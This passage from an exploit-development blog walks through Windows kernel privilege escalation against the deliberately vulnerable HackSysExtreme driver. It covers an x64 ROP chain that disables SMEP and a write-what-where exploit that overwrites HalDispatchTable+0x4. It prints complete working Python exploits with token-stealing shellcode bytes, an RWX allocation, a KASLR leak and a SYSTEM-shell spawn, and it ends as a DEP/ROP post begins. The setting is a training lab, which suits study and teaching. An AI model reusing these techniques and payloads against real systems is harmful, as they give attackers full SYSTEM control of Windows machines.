# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns 0 on failure)
if not get_drivers:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = ("\x41" * 2056)

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)                      # Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# Sending the buffer with IOCTL 0x222003, which reaches the TriggerStackOverflow() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

os.system("cmd.exe /k cd C:\\")

This shellcode adds 0x40 to RSP as you can see from above. This is specific to the process I was exploiting, to resume execution. Also in this case, RAX was already set to 0. Therefore, there was no need to xor rax, rax.
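The and cl, 0xf0 step in the shellcode is also worth a quick illustration. On x64, the Token field is an _EX_FAST_REF whose low 4 bits hold a reference count rather than address bits, so the shellcode masks them off before copying. Below is a minimal sketch of that single instruction; the token value is made up for the example and the helper name is mine.

```python
def and_cl(rcx, imm8):
    """Emulate `and cl, imm8`: only the low byte of RCX is affected."""
    low_byte = (rcx & 0xff) & imm8
    return (rcx & ~0xff) | low_byte


fast_ref = 0xffffa30c4fa5c04b    # hypothetical _EX_FAST_REF value (RefCnt = 0xb)
token = and_cl(fast_ref, 0xf0)   # reference count bits cleared
print("{:#x}".format(token))     # 0xffffa30c4fa5c040
```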

As you can see, SMEP has been bypassed!

SMEP Bypass via PTE Overwrite

Perhaps in another blog I will come back to this. I am going to go back and do some more research on the memory management unit and memory paging in Windows. When that research has concluded, I will get into the low level details of overwriting page table entries to turn user mode pages into kernel mode pages. In addition, I will go and do more research on pool memory in kernel mode and look into how pool overflows and use-after-free kernel exploits function and behave.

Thank you for joining me along this journey! And thank you to Morten Schenk, Alex Ionescu, and Intel. You all have aided me greatly.

Please feel free to contact me with any suggestions, comments, or corrections! I am open to it all.

Peace, love, and positivity :-)

Exploit Development: Windows Kernel Exploitation - Arbitrary Overwrites (Write-What-Where)

13 November 2019 at 00:00

Introduction

In a previous post, I talked about setting up a Windows kernel debugging environment. Today, I will be building on the foundation laid in that post. Again, we will be taking a look at the HackSysExtreme vulnerable driver. The HackSysExtreme team implemented a plethora of vulnerabilities here, each reachable based on the IOCTL code sent to the driver. The vulnerability we are going to take a look at today is what is known as an arbitrary overwrite.

At a very high level, this means an adversary has the ability to write a piece of data (generally going to be shellcode, or a pointer to it) to a particular, controlled location. As you may recall from my previous post, the reason why we are able to obtain local administrative privileges (NT AUTHORITY\SYSTEM) is because we have the ability to do the following:

  1. Allocate a piece of memory in user land that contains our shellcode
  2. Execute said shellcode from the context of ring 0 in kernel land

Since the shellcode is being executed in the context of ring 0, the most privileged level on the system, the shellcode will be run with full kernel privileges. Since our shellcode will copy the NT AUTHORITY\SYSTEM token to a cmd.exe process, our shell will be an administrative shell.
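To make the token copy concrete, here is a toy model of what the shellcode does: walk a circular list of processes until the SYSTEM process (PID 4) is found, then copy its token onto the current process. This is only a sketch in plain Python; the class, its fields, and the PIDs other than 4 are illustrative and do not reflect real EPROCESS offsets.

```python
class Process(object):
    """Toy stand-in for an EPROCESS entry (fields are illustrative only)."""

    def __init__(self, pid, token):
        self.pid = pid
        self.token = token
        self.next = None  # stand-in for ActiveProcessLinks.Flink


def steal_system_token(current):
    """Walk the circular process list until PID 4, then copy its token."""
    candidate = current.next
    while candidate.pid != 4:
        candidate = candidate.next
        if candidate is current:
            raise LookupError("SYSTEM process not found")
    current.token = candidate.token
    return current


# Build a small circular list: cmd.exe -> explorer.exe -> System -> cmd.exe
cmd = Process(1337, "user token")
explorer = Process(2048, "user token")
system = Process(4, "SYSTEM token")
cmd.next, explorer.next, system.next = explorer, system, cmd

steal_system_token(cmd)
print(cmd.token)  # SYSTEM token
```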

Code Analysis

First let’s look at the ArbitraryWrite.h header file.

Take a look at the following snippet:

typedef struct _WRITE_WHAT_WHERE
{
    PULONG_PTR What;
    PULONG_PTR Where;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

typedef, in C, allows us to give a data type a name of our own. Just as char and int are data types, here we have defined our own data type.

Then, the WRITE_WHAT_WHERE line, is an alias that can be now used to reference the struct _WRITE_WHAT_WHERE. Then lastly, an aliased pointer is created called PWRITE_WHAT_WHERE.

Most importantly, we have a pointer called What and a pointer called Where. Essentially now, WRITE_WHAT_WHERE refers to this struct containing What and Where. PWRITE_WHAT_WHERE, when referenced, is a pointer to this struct.
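For reference, the same layout can be mirrored from Python with ctypes, which is the shape the exploit later in this post relies on. The sketch below only inspects the structure's size and field offsets; it assumes nothing beyond two pointer-sized members.

```python
import ctypes


class WriteWhatWhere(ctypes.Structure):
    """Python mirror of WRITE_WHAT_WHERE: two pointer-sized fields."""
    _fields_ = [
        ("What", ctypes.c_void_p),
        ("Where", ctypes.c_void_p),
    ]


pointer_size = ctypes.sizeof(ctypes.c_void_p)
total_size = ctypes.sizeof(WriteWhatWhere)

# What sits at offset 0, Where immediately after it
print("size = {0}, What @ {1}, Where @ {2}".format(
    total_size, WriteWhatWhere.What.offset, WriteWhatWhere.Where.offset))
```

On a 32-bit target the structure is 8 bytes, which is why the exploit passes 0x8 as the input buffer size.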

Moving on down the header file, this is presented to us:

NTSTATUS
TriggerArbitraryWrite(
    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
);

Now, the parameter UserWriteWhatWhere has been declared with the data type PWRITE_WHAT_WHERE. As you can recall from above, PWRITE_WHAT_WHERE is a pointer to the struct that contains the What and Where pointers (which will be exploited later on). From now on, UserWriteWhatWhere also points to the struct.

Let’s move on to the source file, ArbitraryWrite.c.

The above function, TriggerArbitraryWrite(), is defined in the source file.

Then, local What and Where pointers, matching the members of the struct, are initialized as NULL pointers:

PULONG_PTR What = NULL;
PULONG_PTR Where = NULL;

Then finally, we reach our vulnerability:

#else
        DbgPrint("[+] Triggering Arbitrary Write\n");

        //
        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
        // because the developer is writing the value pointed by 'What' to memory location
        // pointed by 'Where' without properly validating if the values pointed by 'Where'
        // and 'What' resides in User mode
        //

        *(Where) = *(What);

As you can see, an adversary could write the value pointed to by What to the memory location referenced by Where. The real issue is that there is no validation, using a kernel routine such as ProbeForRead() or ProbeForWrite(), that confirms whether or not the addresses in What and Where reside in user mode. Knowing this, we will be able to utilize our user mode shellcode going forward for the exploit.
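The difference a check would make can be sketched with a toy address space. This is only a conceptual model, not how ProbeForRead() or ProbeForWrite() are implemented; the boundary constant, helper names, and addresses are assumptions chosen for a 32-bit layout.

```python
USER_SPACE_LIMIT = 0x7FFFFFFF  # assumption: highest user mode address on 32-bit Windows


def is_user_address(address):
    """Hypothetical helper: True if the address lies in user space."""
    return 0 <= address <= USER_SPACE_LIMIT


def vulnerable_write(memory, what, where):
    """Mirrors *(Where) = *(What): no check on either pointer."""
    memory[where] = memory[what]


def checked_write(memory, what, where):
    """Same write, but rejects pointers outside user space first."""
    if not (is_user_address(what) and is_user_address(where)):
        raise ValueError("pointer outside user space")
    memory[where] = memory[what]


# Toy address space: one user mode value, one kernel mode slot
memory = {0x00401000: 0x41414141, 0x82A4B3FC: 0x0}
vulnerable_write(memory, 0x00401000, 0x82A4B3FC)  # kernel address accepted
print("{:#x}".format(memory[0x82A4B3FC]))         # 0x41414141
```

Calling checked_write() with the same arguments raises instead of touching the kernel mode slot.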

IOCTL

As you can recall in the last blog, the IOCTL code that was used to interact with the HEVD vulnerable driver and take advantage of the TriggerStackOverflow() function, occurred at this routine:

After tracing the IOCTL routine that jumps into the TriggerArbitraryOverwrite() function, here is what is displayed:

The above routine is part of a chain as displayed as below:

Now it is time to calculate the IOCTL code, which allows us to interact with the vulnerable routine. Essentially, look at the very first routine from above, which was utilized for my last blog post. The IOCTL code was 0x222003. (Notice how the value is written with only 6 hex digits, even though it is a 32-bit value on x86. 0x222003 = 0x00222003) The instruction sub eax, 0x222003 will yield a value of zero, and the jz short loc_155FB (jump if zero) will jump into the TriggerStackOverflow() function. So essentially, using deductive reasoning, EAX contains a value of 0x222003 just before the subtraction whenever that jump is taken.
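As an aside, the IOCTL value itself is not arbitrary. Assuming the driver builds its codes with the standard CTL_CODE macro layout (device type, access, function, method), which this post does not show directly, 0x222003 can be pulled apart as follows. The helper name is mine.

```python
def decode_ioctl(code):
    """Split a 32-bit IOCTL code into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,  # 0x22 is FILE_DEVICE_UNKNOWN
        "access": (code >> 14) & 0x3,          # 0 is FILE_ANY_ACCESS
        "function": (code >> 2) & 0xFFF,       # driver-defined function number
        "method": code & 0x3,                  # 3 is METHOD_NEITHER
    }


fields = decode_ioctl(0x222003)
print("function = {:#x}, method = {}".format(fields["function"], fields["method"]))
```

Because the function number is shifted left by two bits, consecutive function numbers produce IOCTL codes that are 4 apart.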

Looking at the second and third routines in the image above:

sub eax, 4
jz short loc_155E3

and

sub eax, 4
jz short loc_155CB

Our goal is to successfully complete the “jump if zero” jump into the applicable vulnerability. In this case, the third routine shown above, will lead us directly into the TriggerArbitraryOverwrite(), if the corresponding “jump if zero” jump is completed.

If EAX starts at 0x222003 for the first routine, and the next two routines subtract a total of 8 from EAX (4 each), let’s try adding 8 to the IOCTL code from the last exploit, 0x222003. Adding 8 will give us a value of 0x22200B, or 0x0022200B as a full 32-bit value. That means the first subtraction leaves 8 in EAX, the second routine leaves 4, and the last routine leaves 0, which makes the applicable jump into the TriggerArbitraryOverwrite() function!
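The subtraction chain is easy to replay in a few lines. The sketch below models the three sub/jz pairs described above; the middle routine is not named in this post, so it is labeled generically.

```python
def dispatch(ioctl_code):
    """Replay the sub/jz chain and report which branch is taken."""
    eax = ioctl_code
    steps = [
        (0x222003, "TriggerStackOverflow"),
        (4, "second routine"),              # not named in the text
        (4, "TriggerArbitraryOverwrite"),
    ]
    for amount, target in steps:
        eax = (eax - amount) & 0xFFFFFFFF   # sub eax, amount (32-bit wraparound)
        if eax == 0:                        # jz taken
            return target
    return None


print(dispatch(0x222003))   # TriggerStackOverflow
print(dispatch(0x22200B))   # TriggerArbitraryOverwrite
```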

Proof Of Concept

Utilizing the newly calculated IOCTL, let’s create a POC:

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

poc = "\x41\x41\x41\x41"                # What
poc += "\x42\x42\x42\x42"               # Where
poc_length = len(poc)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    poc,                                # lpInBuffer
    poc_length,                         # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

After setting up the debugging environment, run the POC. As you can see, What and Where have been cleanly overwritten!

HALp! How Do I Hax?

At the current moment, we have the ability to write a given value at a certain location. How does this help? Let’s talk a bit more on the ability to execute user mode shellcode from kernel mode.

In the stack overflow vulnerability, our user mode memory was directly copied to kernel mode without any check. In this case, however, things are not that straightforward. Here, there is no memory copy DIRECTLY to kernel mode.

However, there is one way we can execute user mode shellcode from kernel mode. Said way is via the HalDispatchTable (Hardware Abstraction Layer Dispatch Table).

Let’s talk about why we are doing what we are doing, and why the HalDispatchTable is important.

The hardware abstraction layer, in Windows, is a part of the kernel that provides routines dealing with hardware/machine instructions. Basically it allows multiple hardware architectures to be compatible with Windows, without the need for a different version of the operating system.

Having said that, there is an undocumented Windows API function known as NtQueryIntervalProfile().

What does NtQueryIntervalProfile() have to do with the kernel? How does the HalDispatchTable even help us? Let’s talk about this.

If you disassemble the NtQueryIntervalProfile() in WinDbg, you will see that a function called KeQueryIntervalProfile() is called in this function:

uf nt!NtQueryIntervalProfile:

If we disassemble the KeQueryIntervalProfile(), you can see the HalDispatchTable actually gets called by this function, via a pointer!

uf nt!KeQueryIntervalProfile:

Essentially, the pointer stored at HalDispatchTable + 0x4 is called by KeQueryIntervalProfile(). If we can overwrite that pointer with a pointer to our user mode shellcode, natural execution will eventually execute our shellcode when NtQueryIntervalProfile() (which calls KeQueryIntervalProfile()) is called!
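The idea can be modeled with an ordinary table of function pointers. In the toy sketch below, a Python list stands in for the HalDispatchTable and index 1 stands in for the entry at + 0x4 (pointers are 4 bytes on x86); every name here is illustrative.

```python
def original_handler():
    return "original HAL routine"


def shellcode():
    return "attacker shellcode"


# Toy dispatch table: slot 1 stands in for HalDispatchTable + 0x4
dispatch_table = [None, original_handler]


def ke_query_interval_profile():
    """Stand-in for KeQueryIntervalProfile(): calls through slot 1."""
    return dispatch_table[1]()


before = ke_query_interval_profile()
dispatch_table[1] = shellcode          # the arbitrary write lands here
after = ke_query_interval_profile()
print("{0} -> {1}".format(before, after))
```

The caller never changes; only the pointer it trusts does.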

Order Of Operations

Here are the steps we need to take, in order for this to work:

  1. Enumerate all drivers addresses via EnumDeviceDrivers()
  2. Sort through the list of addresses for the address of ntoskrnl.exe (ntoskrnl.exe exports the HalDispatchTable)
  3. Load ntoskrnl.exe into our user mode process with LoadLibraryExA and then resolve the HalDispatchTable address via GetProcAddress
  4. Once the HalDispatchTable address is found, we will calculate the address of HalDispatchTable + 0x4 (by adding 4 bytes), and overwrite that pointer with a pointer to our user mode shellcode

EnumDeviceDrivers()

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns 0 on failure)
if not get_drivers:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

This snippet of code enumerates the base addresses for the drivers, and stores them in an array. After the base addresses have been enumerated, we can move on to finding the address of ntoskrnl.exe.

ntoskrnl.exe

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    # 'ntkrnl' matches kernel image names such as ntkrnlpa.exe
    if 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It is assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break

This is a snippet of code that essentially will loop through the array where all of the base addresses have been exported to, and search for ntoskrnl.exe via GetDeviceDriverBaseNameA(). Once that has been found, the address will be stored.

LoadLibraryExA()

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case the kernel image found above)
    None,                               # hFile (parameter must be null)
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

In this snippet, LoadLibraryExA() receives the file name found via GetDeviceDriverBaseNameA() (which is ntoskrnl.exe in this case) and loads that image into our user mode process. The snippet below then passes the resulting handle (which still refers to ntoskrnl.exe) to the function GetProcAddress().

GetProcAddress()

hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

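GetProcAddress() will reveal to us the address of the HalDispatchTable within the user mode copy of ntoskrnl.exe. Subtracting the user mode base and adding the kernel mode base gives the address of the HalDispatchTable in the kernel, and from there HalDispatchTable + 0x4. We are more interested in HalDispatchTable + 0x4.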
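The rebasing arithmetic in the snippet above is worth seeing with numbers plugged in. All three addresses below are made-up values for illustration only, and the helper name is mine.

```python
def rebase(user_symbol, user_base, kernel_base):
    """Translate a symbol address from the user mode copy to the kernel image."""
    return user_symbol - user_base + kernel_base


# Hypothetical values for illustration only
user_base = 0x00400000      # where LoadLibraryExA mapped the image
user_symbol = 0x0052B3F8    # GetProcAddress result for HalDispatchTable
kernel_base = 0x82A17000    # base reported by EnumDeviceDrivers

hal = rebase(user_symbol, user_base, kernel_base)
real_hal = hal + 0x4        # the entry NtQueryIntervalProfile() ends up calling
print("HAL = {:#x}, HAL + 0x4 = {:#x}".format(hal, real_hal))
```

The offset of the symbol inside the image is the same in both mappings, which is the only reason this works.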

Once we have the address for HalDispatchTable + 0x4, we can weaponize our exploit:

# HackSysExtreme Vulnerable Driver Kernel Exploit (Arbitrary Overwrite)
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

payload = bytearray(
    "\x90\x90\x90\x90"                # NOP sled
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz 0x1a
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
    "\x31\xc0"                        # xor eax, eax (restore execution)
    "\x83\xc4\x24"                    # add esp, 0x24 (restore execution)
    "\x5d"                            # pop ebp
    "\xc2\x08\x00"                    # ret 0x8
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Python, when using id() to return an object's address, is 20 bytes short of the value itself (the first bytes hold the object header)
# After id() returns the address, it is then necessary to increase the returned value by 20 bytes
payload_address = id(payload) + 20
payload_updated = struct.pack("<L", ptr)
payload_final = id(payload_updated) + 20

# Location of shellcode update statement
print "[+] Location of shellcode: {0}".format(hex(payload_address))

# Location of pointer to shellcode
print "[+] Location of pointer to shellcode: {0}".format(hex(payload_final))

# The goal is to eventually locate HAL table.
# HAL is exported by ntoskrnl.exe
# ntoskrnl.exe's location can be enumerated via EnumDeviceDrivers() and GetDeviceDriverBaseNameA() functions via Windows API.

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns 0 on failure)
if not get_drivers:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    # 'ntkrnl' matches kernel image names such as ntkrnlpa.exe
    if 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It is assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break
    
# Now that all of the proper information to reference HAL has been enumerated, it is time to get the location of HAL and HAL + 0x4
# NtQueryIntervalProfile is an undocumented Windows API function that references HAL at the location of HAL +0x4.
# HAL +0x4 is the address we will eventually need to write over. Once HAL is exported, we will be most interested in HAL + 0x4

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case the kernel image found above)
    None,                               # hFile (parameter must be null)
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

# Getting HAL Address
hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (address of a pointer to our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))


# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    write_what_where_pointer,           # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)
    
# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

# Print update for NT AUTHORITY\SYSTEM shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
Popen("start cmd", shell=True)

There is a lot to digest here. Let’s look at the following:

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (address of a pointer to our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))

Here is where the What and Where come into play. We create a variable called write_what_where, an instance of the WriteWhatWhere class, and set its What field to the address of a pointer to our shellcode. The same thing happens with Where, but it receives the address of HalDispatchTable + 0x4. In the end, a pointer to write_what_where, which now holds all of our useful information about our pointer to the shellcode and HalDispatchTable + 0x4, is passed to the DeviceIoControl() function, which actually interacts with the driver.
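The extra level of indirection on What is easy to get wrong, so here is a small sketch that emulates the driver's *(Where) = *(What) entirely inside an ordinary process. Nothing here touches the kernel: the slot being overwritten is a plain ctypes variable standing in for HalDispatchTable + 0x4, and the shellcode address is a placeholder.

```python
import ctypes


class WriteWhatWhere(ctypes.Structure):
    _fields_ = [("What", ctypes.c_void_p), ("Where", ctypes.c_void_p)]


SHELLCODE_ADDRESS = 0x00B70000  # hypothetical address of the RWX region

# 'What' must point at memory that *contains* the shellcode address
pointer_to_shellcode = ctypes.c_void_p(SHELLCODE_ADDRESS)
# Stand-in for the HalDispatchTable + 0x4 slot (ordinary process memory here)
hal_slot = ctypes.c_void_p(0x11111111)

request = WriteWhatWhere(
    ctypes.addressof(pointer_to_shellcode),
    ctypes.addressof(hal_slot),
)

# Emulate the driver: read the value What points to, store it where Where points
value = ctypes.c_void_p.from_address(request.What).value
ctypes.c_void_p.from_address(request.Where).value = value

print("{:#x}".format(hal_slot.value))  # 0xb70000
```

If What held the shellcode address directly, the driver would instead copy the first bytes of the shellcode into the slot, which is not what we want.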

One last thing. Take a peek here:

# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

The whole reason this exploit works in the first place is because, after everything is in place, we call NtQueryIntervalProfile(). Although this function never receives any of our parameters, pointers, or variables, it does not matter. A pointer to our shellcode will be located at HalDispatchTable + 0x4 BEFORE the call to NtQueryIntervalProfile(). Calling NtQueryIntervalProfile() ensures that the pointer at HalDispatchTable + 0x4 gets called (because NtQueryIntervalProfile() calls KeQueryIntervalProfile(), which calls through HalDispatchTable + 0x4). And then just like that, our payload will be executed!

All Together Now

Final execution of the exploit- and we have an administrative shell!! Pwn all of the things!

Wrapping Up

Thanks again to the HackSysExtreme team for their vulnerable driver, and other fellow security researchers like rootkit for their research! As I keep going down the kernel route, I hope to be making it over to x64 here in the near future! Please contact me with any questions, comments, or corrections!

Peace, love, and positivity! :-)

Exploit Development: Hands Up! Give Us the Stack! This Is a ROPpery!

21 September 2019 at 00:00

Introduction

Over the years, the security community as a whole realized that there needed to be a way to stop exploit developers from easily executing malicious shellcode. Microsoft, over time, has implemented a plethora of intense exploit mitigations, such as: EMET (the Enhanced Mitigation Experience Toolkit), CFG (Control Flow Guard), Windows Defender Exploit Guard, and ASLR (Address Space Layout Randomization).

DEP, or Data Execution Prevention, is another one of those roadblocks that hinders exploit developers. This blog post will only be focusing on defeating DEP, within a stack-based data structure on Windows.

A Brief Word About DEP

Windows XP SP2 32-bit was the first Windows operating system to ship DEP. Every version of Windows since then has included DEP. DEP, at a high level, gives memory two independent permission levels. They are:

  • The ability to write to memory.

    OR

  • The ability to execute memory.

But not both.

